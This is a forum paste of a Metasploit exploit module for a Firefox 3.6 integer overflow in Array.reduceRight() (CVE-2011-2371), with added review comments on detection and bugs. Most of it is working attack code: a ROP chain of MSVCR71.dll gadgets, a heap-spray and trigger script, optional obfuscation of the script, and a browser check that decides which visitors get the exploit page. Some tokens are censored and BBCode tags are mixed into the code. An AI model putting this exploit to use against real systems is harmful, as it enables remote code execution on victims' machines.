[COLOR=#008200]## [/COLOR][COLOR=#008200]# $Id: mozilla_reduceright.rb 13909 2011-10-13 03:16:15Z sinn3r $ [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]# This file is part of the ****sploit Framework and may be subject to [/COLOR]
[COLOR=#008200]# redistribution and commercial restrictions. Please see the ****sploit [/COLOR]
[COLOR=#008200]# Framework web site for more information on licensing and terms of use. [/COLOR]
[COLOR=#008200]# http://****sploit.com/framework/ [/COLOR]
[COLOR=#008200]## [/COLOR]
require [COLOR=#0000ff]'msf/core'[/COLOR]
# Browser exploit module for Mozilla Firefox 3.6 (CVE-2011-2371, Array.reduceRight()
# integer overflow). It is a remote HTTP-server module: the framework serves a page and
# on_request_uri builds the response per client request.
#
# NOTE(review): this listing is a forum paste — BBCode colour tags and several censored
# tokens ("****", "********") are interleaved with the Ruby; it is not runnable as shown.
[B][COLOR=#006699]class[/COLOR][/B] ****sploit3 < Msf::Exploit::Remote
Rank = AverageRanking
# HttpServer::HTML mixin provides on_request_uri, send_response, send_not_found,
# datastore access and the HTML helpers used below.
include Msf::Exploit::Remote::HttpServer::[COLOR=#0066cc]HTML[/COLOR]
# Module metadata (name, references, payload constraints, single Windows target) and
# the module's one option, OBFUSCATE.
#
# @param info [Hash] metadata supplied by the framework, merged via update_info
[B][COLOR=#006699]def[/COLOR][/B] initialize(info={})
[B][COLOR=#006699]super[/COLOR][/B](update_info(info,
[COLOR=#0000ff]'Name'[/COLOR] => [COLOR=#0000ff]"Mozilla Firefox Array.reduceRight() Integer Overflow"[/COLOR],
[COLOR=#0000ff]'Description'[/COLOR] => %q{
This [B][COLOR=#006699]module[/COLOR][/B] exploits a vulnerability found [B][COLOR=#006699]in[/COLOR][/B] Mozilla Firefox [COLOR=#0066cc]3[/COLOR].[COLOR=#0066cc]6[/COLOR]. When an
array object is configured with a large length value, the reduceRight() method
may cause an invalid index being used, allowing abitrary remote code execution.
Please note that the exploit requires a longer amount of time (compare to a
typical browser exploit) [B][COLOR=#006699]in[/COLOR][/B] order to gain control of the machine.
},
[COLOR=#0000ff]'License'[/COLOR] => [COLOR=#0066cc]MSF_LICENSE[/COLOR],
[COLOR=#0000ff]'Version'[/COLOR] => [COLOR=#0000ff]"$Revision: 13909 $"[/COLOR],
[COLOR=#0000ff]'Author'[/COLOR] =>
[
[COLOR=#0000ff]'Chris Rohlf'[/COLOR], [COLOR=#008200]#Matasano Security (Initial discovery according to Mozilla.org) [/COLOR]
[COLOR=#0000ff]'Yan Ivnitskiy'[/COLOR], [COLOR=#008200]#Matasano Security (Initial discovery with Chris?) [/COLOR]
[COLOR=#0000ff]'Matteo Memelli'[/COLOR], [COLOR=#008200]#PoC from Exploit-DB [/COLOR]
[COLOR=#0000ff]'dookie2000ca'[/COLOR], [COLOR=#008200]#"Helping" ryujin (Matteo) [/COLOR]
[COLOR=#0000ff]'sinn3r'[/COLOR], [COLOR=#008200]#****sploit [/COLOR]
],
[COLOR=#0000ff]'References'[/COLOR] =>
[
[[COLOR=#0000ff]'CVE'[/COLOR], [COLOR=#0000ff]'2011-2371'[/COLOR]],
# NOTE(review): the URL below carries a duplicated scheme ("http://http://").
[[COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'http://http://www.exploit-db.com/exploits/17974/'[/COLOR]],
[[COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'https://bugzilla.mozilla.org/show_bug.cgi?id=664009'[/COLOR]]
],
[COLOR=#0000ff]'Payload'[/COLOR] =>
{
[COLOR=#0000ff]'BadChars'[/COLOR] => [COLOR=#0000ff]"\x00"[/COLOR],
[COLOR=#0000ff]'PrependEncoder'[/COLOR] => [COLOR=#0000ff]"\xbc\x0c\x0c\x0c\x0c"[/COLOR],
},
[COLOR=#0000ff]'DefaultOptions'[/COLOR] =>
{
[COLOR=#0000ff]'ExitFunction'[/COLOR] => [COLOR=#0000ff]"process"[/COLOR],
[COLOR=#0000ff]'InitialAutoRunScript'[/COLOR] => [COLOR=#0000ff]'migrate -f'[/COLOR],
},
[COLOR=#0000ff]'Platform'[/COLOR] => [COLOR=#0000ff]'win'[/COLOR],
[COLOR=#0000ff]'Targets'[/COLOR] =>
[
[COLOR=#008200]#Windows XP / Vista / 7 [/COLOR]
[ [COLOR=#0000ff]'Mozilla Firefox 3.6.16'[/COLOR], {} ],
],
[COLOR=#0000ff]'Privileged'[/COLOR] => [B][COLOR=#006699]false[/COLOR][/B],
[COLOR=#0000ff]'DisclosureDate'[/COLOR] => [COLOR=#0000ff]"Jun 21 2011"[/COLOR],
[COLOR=#0000ff]'DefaultTarget'[/COLOR] => [COLOR=#0066cc]0[/COLOR]
))
# OBFUSCATE (default false) runs the generated JavaScript through JSObfu in
# on_request_uri; it changes only the served script text, not the module's logic.
register_options(
[
OptBool.[B][COLOR=#006699]new[/COLOR][/B]([COLOR=#0000ff]'OBFUSCATE'[/COLOR], [[B][COLOR=#006699]false[/COLOR][/B], [COLOR=#0000ff]'Enable JavaScript obfuscation'[/COLOR]])
], [B][COLOR=#006699]self[/COLOR][/B].[B][COLOR=#006699]class[/COLOR][/B])
[B][COLOR=#006699]end[/COLOR][/B]
# Random 32-bit filler: four random alphabetic bytes read as one native-endian
# unsigned 32-bit word ("L"). Used to pad the pointer table in on_request_uri.
#
# @return [Integer] a fresh value on every call (not deterministic)
[B][COLOR=#006699]def[/COLOR][/B] junk
[B][COLOR=#006699]return[/COLOR][/B] rand_text_alpha([COLOR=#0066cc]4[/COLOR]).unpack([COLOR=#0000ff]"L"[/COLOR])[[COLOR=#0066cc]0[/COLOR]].to_i
[B][COLOR=#006699]end[/COLOR][/B]
# Handles one HTTP request. Flow: gate on the User-Agent header (unsupported browsers
# get a 404 and a verbose error), build the packed ROP/pointer data, embed it as
# unescape() strings in a JavaScript heap-spray + trigger script, wrap that in an HTML
# page with an APPLET element, optionally obfuscate the script, and send the page.
#
# Detection notes: the served page is identifiable by the APPLET tag referencing
# "trigger.class", by the inline script with very long unescape("%u....") literals,
# and by the reduceRight() call on an Array whose length is set to 2197815302.
#
# @param cli     client connection; peerhost/peerport are logged before responding
# @param request the HTTP request; only its User-Agent header is consulted
# @return [nil]
[B][COLOR=#006699]def[/COLOR][/B] on_request_uri(cli, request)
agent = request.headers[[COLOR=#0000ff]'User-Agent'[/COLOR]]
# NOTE(review): "[16|17]" is a character class, not an alternation, so the gate
# matches any "Firefox/3.6." followed by one of the characters 1, 6, | or 7 — e.g.
# 3.6.1 or 3.6.18 pass as well as 3.6.16/3.6.17. Confirm this is intended; the only
# declared target is 3.6.16. A nil User-Agent also fails the match (nil !~ is true).
[B][COLOR=#006699]if[/COLOR][/B] agent !~ /Firefox\/[COLOR=#0066cc]3[/COLOR]\.[COLOR=#0066cc]6[/COLOR]\.[[COLOR=#0066cc]16[/COLOR]|[COLOR=#0066cc]17[/COLOR]]/
vprint_error([COLOR=#0000ff]"This browser is not supported: #{agent.to_s}"[/COLOR])
send_not_found(cli)
[B][COLOR=#006699]return[/COLOR][/B]
[B][COLOR=#006699]end[/COLOR][/B]
[COLOR=#008200]#mona.py tekniq! + Payload [/COLOR]
# Gadget address list, packed below as little-endian 32-bit words ('V*'). The
# per-entry comments are the original author's; the chain is prepended to the
# encoded payload when js_payload is built.
rop = [
0x7c346c0a, [COLOR=#008200]# POP EAX # RETN (MSVCR71.dll) [/COLOR]
0x7c37a140, [COLOR=#008200]# Make EAX readable [/COLOR]
0x7c37591f, [COLOR=#008200]# PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll) [/COLOR]
0x7c348b06, [COLOR=#008200]# EBP (NOP) [/COLOR]
0x7c346c0a, [COLOR=#008200]# POP EAX # RETN (MSVCR71.dll) [/COLOR]
0x7c37a140, [COLOR=#008200]# <- VirtualProtect() found in IAT [/COLOR]
0x7c3530ea, [COLOR=#008200]# MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) [/COLOR]
0x7c346c0b, [COLOR=#008200]# Slide, so next gadget would write to correct stack ******** [/COLOR]
0x7c376069, [COLOR=#008200]# MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) [/COLOR]
0x7c348b06, [COLOR=#008200]# EDI (filler) [/COLOR]
0x7c348b06, [COLOR=#008200]# will be patched at runtime (VP), then picked up into ESI [/COLOR]
0x7c348b06, [COLOR=#008200]# EBX (filler) [/COLOR]
0x7c376402, [COLOR=#008200]# POP EBP # RETN (msvcr71.dll) [/COLOR]
0x7c345c30, [COLOR=#008200]# ptr to push esp # ret (from MSVCR71.dll) [/COLOR]
0x7c346c0a, [COLOR=#008200]# POP EAX # RETN (MSVCR71.dll) [/COLOR]
0xfffff82f, [COLOR=#008200]# size 20001 bytes [/COLOR]
0x7c351e05, [COLOR=#008200]# NEG EAX # RETN (MSVCR71.dll) [/COLOR]
0x7c354901, [COLOR=#008200]# POP EBX # RETN (MSVCR71.dll) [/COLOR]
0xffffffff, [COLOR=#008200]# pop value into ebx [/COLOR]
0x7c345255, [COLOR=#008200]# INC EBX # FPATAN # RETN (MSVCR71.dll) [/COLOR]
0x7c352174, [COLOR=#008200]# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) [/COLOR]
0x7c34d201, [COLOR=#008200]# POP ECX # RETN (MSVCR71.dll) [/COLOR]
0x7c38b001, [COLOR=#008200]# RW pointer (lpOldProtect) (-> ecx) [/COLOR]
0x7c34b8d7, [COLOR=#008200]# POP EDI # RETN (MSVCR71.dll) [/COLOR]
0x7c34b8d8, [COLOR=#008200]# ROP NOP (-> edi) [/COLOR]
0x7c344f87, [COLOR=#008200]# POP EDX # RETN (MSVCR71.dll) [/COLOR]
0xffffffc0, [COLOR=#008200]# value to negate, target value : 0x00000040, target: edx [/COLOR]
0x7c351eb1, [COLOR=#008200]# NEG EDX # RETN (MSVCR71.dll) [/COLOR]
0x7c346c0a, [COLOR=#008200]# POP EAX # RETN (MSVCR71.dll) [/COLOR]
0x90909090, [COLOR=#008200]# NOPS (-> eax) [/COLOR]
0x7c378c81, [COLOR=#008200]# PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) [/COLOR]
].pack([COLOR=#0000ff]'V*'[/COLOR])
# Pointer table: 16-bit 0x4141 markers ('v*') alternate with groups of 32-bit
# words ('V*'); the junk entries are random per request (see #junk), so the table
# bytes differ on every response.
table = [0x4141].pack([COLOR=#0000ff]'v*'[/COLOR])
table << [
0x0c000048,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
].pack([COLOR=#0000ff]'V*'[/COLOR])
table << [0x4141].pack([COLOR=#0000ff]'v*'[/COLOR])
table << [
0x7c370eef,
junk,
].pack([COLOR=#0000ff]'V*'[/COLOR])
table << [0x4141].pack([COLOR=#0000ff]'v*'[/COLOR])
table << [
0x3410240c,
0x0c00007c,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
0x0c00002e
].pack([COLOR=#0000ff]'V*'[/COLOR])
# Encoded payload and the target's endianness; both binary blobs are converted to
# JavaScript "%uXXXX" escape strings for unescape() in the script below.
p = payload.encoded
arch = Rex::Arch.endian(target.arch)
js_payload = Rex::Text.to_unescape(rop + p, arch)
js_ptrs = Rex::Text.to_unescape(table, arch)
[COLOR=#008200]#Pretty much based on Matteo's code except for the size adjustment to a**** a busted heap [/COLOR]
# JavaScript served to the client: spray() builds hspray from ptrs + padding +
# payload + trailing padding and stores it 0x60 times, then the trigger sets an
# oversized Array length and calls reduceRight().
js = <<-[COLOR=#0066cc]JS[/COLOR]
var applet = ********.getElementById([COLOR=#0000ff]'MyApplet'[/COLOR]);
function spray() {
var ptrs = unescape([COLOR=#0000ff]"#{js_ptrs}"[/COLOR]);
var bheader = 0x12/[COLOR=#0066cc]2[/COLOR];
var nullt = 0x2/[COLOR=#0066cc]2[/COLOR];
var espoffset = ([COLOR=#0066cc]7340[/COLOR] /[COLOR=#0066cc]2[/COLOR]) - ptrs.length;
var esppadding = unescape([COLOR=#0000ff]"%u0c0c%u0c0c"[/COLOR]);
[B][COLOR=#006699]while[/COLOR][/B](esppadding.length < espoffset) esppadding += esppadding;
esppadding = esppadding.substring([COLOR=#0066cc]0[/COLOR], espoffset);
var payload = unescape([COLOR=#0000ff]"#{js_payload}"[/COLOR]);
var tr_padding = unescape([COLOR=#0000ff]"%u0c0c%u0c0c"[/COLOR]);
[B][COLOR=#006699]while[/COLOR][/B] (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
var dummy = ptrs + esppadding + payload + tr_padding;
var hspray = dummy.substring([COLOR=#0066cc]0[/COLOR],0x7fa00 - bheader - nullt);
HeapBlocks = [B][COLOR=#006699]new[/COLOR][/B] [COLOR=#808080]Array[/COLOR]()
[B][COLOR=#006699]for[/COLOR][/B] (i=[COLOR=#0066cc]0[/COLOR];i<0x60;i++){
HeapBlocks[i] += hspray;
}
}
spray();
obj = [B][COLOR=#006699]new[/COLOR][/B] [COLOR=#808080]Array[/COLOR];
obj.length = [COLOR=#0066cc]2197815302[/COLOR];
f = function trigger(prev, myobj, indx, array) {
alert(myobj[[COLOR=#0066cc]0[/COLOR]]);
}
obj.reduceRight(f,[COLOR=#0066cc]1[/COLOR],[COLOR=#0066cc]2[/COLOR],[COLOR=#0066cc]3[/COLOR]);
[COLOR=#0066cc]JS[/COLOR]
# Strips two leading tabs from each heredoc line (the original file was presumably
# tab-indented; this paste has lost its indentation, so the gsub is a no-op here).
js = js.gsub(/^\t\t/, [COLOR=#0000ff]''[/COLOR])
# Optional obfuscation: js becomes a JSObfu object rather than a String. The
# interpolation into the HTML below presumably relies on JSObfu#to_s — confirm.
[B][COLOR=#006699]if[/COLOR][/B] datastore[[COLOR=#0000ff]'OBFUSCATE'[/COLOR]]
js = ::Rex::Exploitation::JSObfu.[B][COLOR=#006699]new[/COLOR][/B](js)
js.obfuscate
[B][COLOR=#006699]end[/COLOR][/B]
# Response body. NOTE(review): the document is closed with "<html>" instead of
# "</html>"; browsers tolerate it, but it is a markup error in the served page.
html = <<-[COLOR=#0066cc]HTML[/COLOR]
<html>
<head>
</head>
<body>
<[COLOR=#0066cc]APPLET[/COLOR] id=[COLOR=#0000ff]"MyApplet"[/COLOR] code=[COLOR=#0000ff]"trigger.class"[/COLOR] width=[COLOR=#0066cc]150[/COLOR] height=[COLOR=#0066cc]50[/COLOR]>
You need a Java-enabled browser to pwn this.
</[COLOR=#0066cc]APPLET[/COLOR]>
**********
[COLOR=#008200]#{js} [/COLOR]
</script>
</body>
<html>
[COLOR=#0066cc]HTML[/COLOR]
# Log the client and send the page as text/html.
print_status([COLOR=#0000ff]"Sending exploit to #{cli.peerhost}:#{cli.peerport}..."[/COLOR])
send_response(cli, html, {[COLOR=#0000ff]'Content-Type'[/COLOR]=>[COLOR=#0000ff]'text/html'[/COLOR]})
[COLOR=#006699][B]end[/B][/COLOR]
[B][COLOR=#006699]end[/COLOR][/B]
